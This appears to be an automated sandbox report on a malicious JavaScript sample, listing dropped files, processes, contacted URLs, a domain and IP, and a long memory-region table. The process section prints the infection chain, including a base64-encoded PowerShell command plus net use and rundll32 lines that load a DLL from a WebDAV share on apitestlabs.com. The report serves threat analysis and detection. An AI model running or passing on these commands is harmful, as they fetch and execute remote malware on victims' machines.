Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
171596613219316174.js
|
ASCII text, with very long lines (65536), with no line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ahpcaheq.bkc.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jaru0nwp.yf5.ps1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\171596613219316174.js"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADEAOAA1ADcAMQA5ADQAMgA1ADYAOQAyAC4AZABsAGwALABFAG4AdAByAHkA
|
|
|
|
C:\Windows\System32\rundll32.exe
|
"C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\2185719425692.dll,Entry
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\net.exe
|
"C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://apitestlabs.com:8888/N
|
unknown
|
||
|
http://apitestlabs.com:8888/~
|
unknown
|
||
|
http://apitestlabs.com:8888/
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
apitestlabs.com
|
94.159.113.48
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
94.159.113.48
|
apitestlabs.com
|
Russian Federation
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
|
JScriptSetScriptStateStarted
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
13055074000
|
heap
|
page read and write
|
||
|
189A36D0000
|
heap
|
page read and write
|
||
|
1305508B000
|
heap
|
page read and write
|
||
|
1EE97FD000
|
stack
|
page read and write
|
||
|
1305509D000
|
heap
|
page read and write
|
||
|
7102D7F000
|
stack
|
page read and write
|
||
|
18989390000
|
heap
|
page read and write
|
||
|
7FF886E10000
|
trusted library allocation
|
page read and write
|
||
|
1E5CA7A0000
|
heap
|
page read and write
|
||
|
13053282000
|
heap
|
page read and write
|
||
|
130551B4000
|
heap
|
page read and write
|
||
|
130532A6000
|
heap
|
page read and write
|
||
|
7FF886E60000
|
trusted library allocation
|
page read and write
|
||
|
13055068000
|
heap
|
page read and write
|
||
|
1E5CD9C3000
|
heap
|
page read and write
|
||
|
75A3FD000
|
stack
|
page read and write
|
||
|
7FF886D22000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D60000
|
trusted library allocation
|
page read and write
|
||
|
189A3530000
|
heap
|
page read and write
|
||
|
7FF886D40000
|
trusted library allocation
|
page read and write
|
||
|
1305329A000
|
heap
|
page read and write
|
||
|
1305574F000
|
heap
|
page read and write
|
||
|
1E5CA610000
|
heap
|
page read and write
|
||
|
1E5CA79A000
|
heap
|
page read and write
|
||
|
1305329B000
|
heap
|
page read and write
|
||
|
15D70E48000
|
heap
|
page read and write
|
||
|
1898B3F2000
|
trusted library allocation
|
page read and write
|
||
|
18989690000
|
trusted library allocation
|
page read and write
|
||
|
13055078000
|
heap
|
page read and write
|
||
|
759FEF000
|
stack
|
page read and write
|
||
|
15D70DF0000
|
heap
|
page read and write
|
||
|
13055068000
|
heap
|
page read and write
|
||
|
7FF886BF0000
|
trusted library allocation
|
page read and write
|
||
|
15D70DB0000
|
heap
|
page read and write
|
||
|
7FF886D50000
|
trusted library allocation
|
page read and write
|
||
|
1305508A000
|
heap
|
page read and write
|
||
|
189893C8000
|
heap
|
page read and write
|
||
|
189A3610000
|
heap
|
page execute and read and write
|
||
|
1898B3DB000
|
trusted library allocation
|
page read and write
|
||
|
1898B391000
|
trusted library allocation
|
page read and write
|
||
|
13055061000
|
heap
|
page read and write
|
||
|
13053278000
|
heap
|
page read and write
|
||
|
1305325D000
|
heap
|
page read and write
|
||
|
189A345F000
|
heap
|
page read and write
|
||
|
1898B4A6000
|
trusted library allocation
|
page read and write
|
||
|
1E5CA79E000
|
heap
|
page read and write
|
||
|
13055094000
|
heap
|
page read and write
|
||
|
1305507D000
|
heap
|
page read and write
|
||
|
1E5CA710000
|
heap
|
page read and write
|
||
|
1305328A000
|
heap
|
page read and write
|
||
|
13053248000
|
heap
|
page read and write
|
||
|
1E5CA7A8000
|
heap
|
page read and write
|
||
|
1305505F000
|
heap
|
page read and write
|
||
|
13055094000
|
heap
|
page read and write
|
||
|
130532A6000
|
heap
|
page read and write
|
||
|
1898B74A000
|
trusted library allocation
|
page read and write
|
||
|
18989600000
|
trusted library allocation
|
page read and write
|
||
|
13053290000
|
heap
|
page read and write
|
||
|
7FF886DB0000
|
trusted library allocation
|
page read and write
|
||
|
15D70E36000
|
heap
|
page read and write
|
||
|
1305328C000
|
heap
|
page read and write
|
||
|
13055081000
|
heap
|
page read and write
|
||
|
E634FF000
|
stack
|
page read and write
|
||
|
E63DFC000
|
stack
|
page read and write
|
||
|
1E5CA7AF000
|
heap
|
page read and write
|
||
|
13053220000
|
heap
|
page read and write
|
||
|
1305505B000
|
heap
|
page read and write
|
||
|
7FF886B4D000
|
trusted library allocation
|
page execute and read and write
|
||
|
75A8BE000
|
stack
|
page read and write
|
||
|
7FF886DA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886C60000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886D10000
|
trusted library allocation
|
page execute and read and write
|
||
|
13055094000
|
heap
|
page read and write
|
||
|
1898B57A000
|
trusted library allocation
|
page read and write
|
||
|
1898B020000
|
heap
|
page execute and read and write
|
||
|
13055088000
|
heap
|
page read and write
|
||
|
75A57F000
|
stack
|
page read and write
|
||
|
13055479000
|
heap
|
page read and write
|
||
|
1E5CDF00000
|
trusted library allocation
|
page read and write
|
||
|
18989406000
|
heap
|
page read and write
|
||
|
13055088000
|
heap
|
page read and write
|
||
|
1898944E000
|
heap
|
page read and write
|
||
|
1898944A000
|
heap
|
page read and write
|
||
|
13055051000
|
heap
|
page read and write
|
||
|
1305505B000
|
heap
|
page read and write
|
||
|
1E5CAA30000
|
heap
|
page read and write
|
||
|
130535BA000
|
heap
|
page read and write
|
||
|
15D70E42000
|
heap
|
page read and write
|
||
|
130535BB000
|
heap
|
page read and write
|
||
|
15D70FD0000
|
remote allocation
|
page read and write
|
||
|
13055055000
|
heap
|
page read and write
|
||
|
13055075000
|
heap
|
page read and write
|
||
|
130535BB000
|
heap
|
page read and write
|
||
|
E635FD000
|
stack
|
page read and write
|
||
|
1EE96FE000
|
stack
|
page read and write
|
||
|
15D70D90000
|
heap
|
page read and write
|
||
|
15D70E0D000
|
heap
|
page read and write
|
||
|
E63185000
|
stack
|
page read and write
|
||
|
1305547A000
|
heap
|
page read and write
|
||
|
7FF886B44000
|
trusted library allocation
|
page read and write
|
||
|
13055094000
|
heap
|
page read and write
|
||
|
7FF886E30000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E40000
|
trusted library allocation
|
page read and write
|
||
|
1305505B000
|
heap
|
page read and write
|
||
|
1305509D000
|
heap
|
page read and write
|
||
|
1EE987C000
|
stack
|
page read and write
|
||
|
189A33FA000
|
heap
|
page read and write
|
||
|
E637FE000
|
stack
|
page read and write
|
||
|
189893D2000
|
heap
|
page read and write
|
||
|
13055088000
|
heap
|
page read and write
|
||
|
13055050000
|
heap
|
page read and write
|
||
|
75A7BE000
|
stack
|
page read and write
|
||
|
1898B839000
|
trusted library allocation
|
page read and write
|
||
|
75A83E000
|
stack
|
page read and write
|
||
|
15D70E48000
|
heap
|
page read and write
|
||
|
1E5CA7A3000
|
heap
|
page read and write
|
||
|
130550A0000
|
heap
|
page read and write
|
||
|
1898B41F000
|
trusted library allocation
|
page read and write
|
||
|
1898B3DD000
|
trusted library allocation
|
page read and write
|
||
|
1899B400000
|
trusted library allocation
|
page read and write
|
||
|
7DF494660000
|
trusted library allocation
|
page execute and read and write
|
||
|
189895E0000
|
trusted library allocation
|
page read and write
|
||
|
15D70E14000
|
heap
|
page read and write
|
||
|
189A33C8000
|
heap
|
page read and write
|
||
|
1E5CA78F000
|
heap
|
page read and write
|
||
|
189895A0000
|
heap
|
page read and write
|
||
|
15D70E3C000
|
heap
|
page read and write
|
||
|
7FF886C26000
|
trusted library allocation
|
page execute and read and write
|
||
|
15D70E36000
|
heap
|
page read and write
|
||
|
7FF886CFA000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E20000
|
trusted library allocation
|
page read and write
|
||
|
75A7B7000
|
stack
|
page read and write
|
||
|
7FF886DE0000
|
trusted library allocation
|
page read and write
|
||
|
13055740000
|
heap
|
page read and write
|
||
|
1898AFC0000
|
heap
|
page read and write
|
||
|
7FF886D90000
|
trusted library allocation
|
page read and write
|
||
|
13055089000
|
heap
|
page read and write
|
||
|
1EE98FF000
|
stack
|
page read and write
|
||
|
1899B391000
|
trusted library allocation
|
page read and write
|
||
|
13055078000
|
heap
|
page read and write
|
||
|
1898940C000
|
heap
|
page read and write
|
||
|
1E5CA7A4000
|
heap
|
page read and write
|
||
|
1E5CD9C0000
|
heap
|
page read and write
|
||
|
13055068000
|
heap
|
page read and write
|
||
|
13053271000
|
heap
|
page read and write
|
||
|
1305509A000
|
heap
|
page read and write
|
||
|
1305505D000
|
heap
|
page read and write
|
||
|
15D70E48000
|
heap
|
page read and write
|
||
|
189896E5000
|
heap
|
page read and write
|
||
|
1E5CA7A3000
|
heap
|
page read and write
|
||
|
75A4FE000
|
stack
|
page read and write
|
||
|
13055094000
|
heap
|
page read and write
|
||
|
7102CFE000
|
stack
|
page read and write
|
||
|
1E5CAA35000
|
heap
|
page read and write
|
||
|
1E5CA9E0000
|
heap
|
page read and write
|
||
|
13055095000
|
heap
|
page read and write
|
||
|
189896E0000
|
heap
|
page read and write
|
||
|
15D70E14000
|
heap
|
page read and write
|
||
|
1E5CA7A3000
|
heap
|
page read and write
|
||
|
7FF886DD0000
|
trusted library allocation
|
page read and write
|
||
|
75A37E000
|
stack
|
page read and write
|
||
|
13055078000
|
heap
|
page read and write
|
||
|
1898B6FE000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D00000
|
trusted library allocation
|
page execute and read and write
|
||
|
18989610000
|
heap
|
page readonly
|
||
|
1E5CA7C1000
|
heap
|
page read and write
|
||
|
13053285000
|
heap
|
page read and write
|
||
|
1305325E000
|
heap
|
page read and write
|
||
|
13055088000
|
heap
|
page read and write
|
||
|
E63AFE000
|
stack
|
page read and write
|
||
|
75A6B7000
|
stack
|
page read and write
|
||
|
75A2FE000
|
stack
|
page read and write
|
||
|
7FF886B42000
|
trusted library allocation
|
page read and write
|
||
|
E639FF000
|
stack
|
page read and write
|
||
|
13055089000
|
heap
|
page read and write
|
||
|
1E5CA6F0000
|
heap
|
page read and write
|
||
|
1898B045000
|
heap
|
page read and write
|
||
|
13053160000
|
heap
|
page read and write
|
||
|
13055078000
|
heap
|
page read and write
|
||
|
189A3390000
|
heap
|
page read and write
|
||
|
1898B040000
|
heap
|
page read and write
|
||
|
7FF886C00000
|
trusted library allocation
|
page execute and read and write
|
||
|
1898B49F000
|
trusted library allocation
|
page read and write
|
||
|
15D70D80000
|
heap
|
page read and write
|
||
|
130535BB000
|
heap
|
page read and write
|
||
|
13055063000
|
heap
|
page read and write
|
||
|
1898B3D8000
|
trusted library allocation
|
page read and write
|
||
|
13055078000
|
heap
|
page read and write
|
||
|
7FF886DC0000
|
trusted library allocation
|
page read and write
|
||
|
1305327A000
|
heap
|
page read and write
|
||
|
15D70FD0000
|
remote allocation
|
page read and write
|
||
|
15D70DE7000
|
heap
|
page read and write
|
||
|
75A9BF000
|
stack
|
page read and write
|
||
|
18989420000
|
heap
|
page read and write
|
||
|
13054D00000
|
heap
|
page read and write
|
||
|
7FF886CE0000
|
trusted library allocation
|
page read and write
|
||
|
75A738000
|
stack
|
page read and write
|
||
|
130535BA000
|
heap
|
page read and write
|
||
|
1E5CA780000
|
heap
|
page read and write
|
||
|
15D70E17000
|
heap
|
page read and write
|
||
|
1898B8C6000
|
trusted library allocation
|
page read and write
|
||
|
75AA3B000
|
stack
|
page read and write
|
||
|
13055052000
|
heap
|
page read and write
|
||
|
1E5CAA3B000
|
heap
|
page read and write
|
||
|
7FF886BF6000
|
trusted library allocation
|
page read and write
|
||
|
1E5CA797000
|
heap
|
page read and write
|
||
|
13053170000
|
heap
|
page read and write
|
||
|
1898B026000
|
heap
|
page execute and read and write
|
||
|
1E5CA7B4000
|
heap
|
page read and write
|
||
|
15D70DE0000
|
heap
|
page read and write
|
||
|
15D70E41000
|
heap
|
page read and write
|
||
|
1898B4A2000
|
trusted library allocation
|
page read and write
|
||
|
18989408000
|
heap
|
page read and write
|
||
|
13055069000
|
heap
|
page read and write
|
||
|
13055067000
|
heap
|
page read and write
|
||
|
15D70E09000
|
heap
|
page read and write
|
||
|
7FF886D80000
|
trusted library allocation
|
page read and write
|
||
|
759F63000
|
stack
|
page read and write
|
||
|
1E5CA7A7000
|
heap
|
page read and write
|
||
|
1898949C000
|
heap
|
page read and write
|
||
|
189896C0000
|
heap
|
page execute and read and write
|
||
|
1305506D000
|
heap
|
page read and write
|
||
|
75A5F9000
|
stack
|
page read and write
|
||
|
189A3423000
|
heap
|
page read and write
|
||
|
1EE967A000
|
stack
|
page read and write
|
||
|
7102DFF000
|
stack
|
page read and write
|
||
|
13053190000
|
heap
|
page read and write
|
||
|
1305506B000
|
heap
|
page read and write
|
||
|
15D70E1C000
|
heap
|
page read and write
|
||
|
1898B860000
|
trusted library allocation
|
page read and write
|
||
|
130532A6000
|
heap
|
page read and write
|
||
|
13053247000
|
heap
|
page read and write
|
||
|
1E5CC1E0000
|
heap
|
page read and write
|
||
|
75A47F000
|
stack
|
page read and write
|
||
|
13055058000
|
heap
|
page read and write
|
||
|
15D70FD0000
|
remote allocation
|
page read and write
|
||
|
7FF886CF1000
|
trusted library allocation
|
page read and write
|
||
|
15D71170000
|
heap
|
page read and write
|
||
|
E638FE000
|
stack
|
page read and write
|
||
|
18989370000
|
heap
|
page read and write
|
||
|
13055099000
|
heap
|
page read and write
|
||
|
13055065000
|
heap
|
page read and write
|
||
|
7FF886B50000
|
trusted library allocation
|
page read and write
|
||
|
75A27E000
|
stack
|
page read and write
|
||
|
1E5CA7C3000
|
heap
|
page read and write
|
||
|
130532D2000
|
heap
|
page read and write
|
||
|
7FF886D30000
|
trusted library allocation
|
page execute and read and write
|
||
|
13055078000
|
heap
|
page read and write
|
||
|
1E5CA7C2000
|
heap
|
page read and write
|
||
|
130535BE000
|
heap
|
page read and write
|
||
|
1898B49C000
|
trusted library allocation
|
page read and write
|
||
|
7102E7E000
|
stack
|
page read and write
|
||
|
13055051000
|
heap
|
page read and write
|
||
|
13055078000
|
heap
|
page read and write
|
||
|
75A63E000
|
stack
|
page read and write
|
||
|
130532A6000
|
heap
|
page read and write
|
||
|
15D70E0D000
|
heap
|
page read and write
|
||
|
13055057000
|
heap
|
page read and write
|
||
|
1305507D000
|
heap
|
page read and write
|
||
|
1305327D000
|
heap
|
page read and write
|
||
|
1305505B000
|
heap
|
page read and write
|
||
|
13055051000
|
heap
|
page read and write
|
||
|
13055088000
|
heap
|
page read and write
|
||
|
1E5CA788000
|
heap
|
page read and write
|
||
|
189A347E000
|
heap
|
page read and write
|
||
|
15D71175000
|
heap
|
page read and write
|
||
|
1898B4E5000
|
trusted library allocation
|
page read and write
|
||
|
7102C7A000
|
stack
|
page read and write
|
||
|
189893FF000
|
heap
|
page read and write
|
||
|
13053228000
|
heap
|
page read and write
|
||
|
18989360000
|
heap
|
page read and write
|
||
|
189893C0000
|
heap
|
page read and write
|
||
|
E63BFE000
|
stack
|
page read and write
|
||
|
18989448000
|
heap
|
page read and write
|
||
|
1898B4EB000
|
trusted library allocation
|
page read and write
|
||
|
13055073000
|
heap
|
page read and write
|
||
|
7FF886BFC000
|
trusted library allocation
|
page execute and read and write
|
||
|
130535B0000
|
heap
|
page read and write
|
||
|
15D70E3E000
|
heap
|
page read and write
|
||
|
7FF886D70000
|
trusted library allocation
|
page read and write
|
||
|
7FF886DF0000
|
trusted library allocation
|
page read and write
|
||
|
1899B39F000
|
trusted library allocation
|
page read and write
|
||
|
13053286000
|
heap
|
page read and write
|
||
|
7FF886E00000
|
trusted library allocation
|
page read and write
|
||
|
1898B3AB000
|
trusted library allocation
|
page read and write
|
||
|
15D70E1C000
|
heap
|
page read and write
|
||
|
1EE977E000
|
stack
|
page read and write
|
||
|
1898B896000
|
trusted library allocation
|
page read and write
|
||
|
130532A6000
|
heap
|
page read and write
|
||
|
13055085000
|
heap
|
page read and write
|
||
|
7FF886B43000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886E50000
|
trusted library allocation
|
page read and write
|
||
|
13055B78000
|
heap
|
page read and write
|
||
|
13053271000
|
heap
|
page read and write
|
||
|
1305327C000
|
heap
|
page read and write
|
||
|
130535B5000
|
heap
|
page read and write
|
||
|
1305328F000
|
heap
|
page read and write
|
There are 287 hidden memdumps, click here to show them.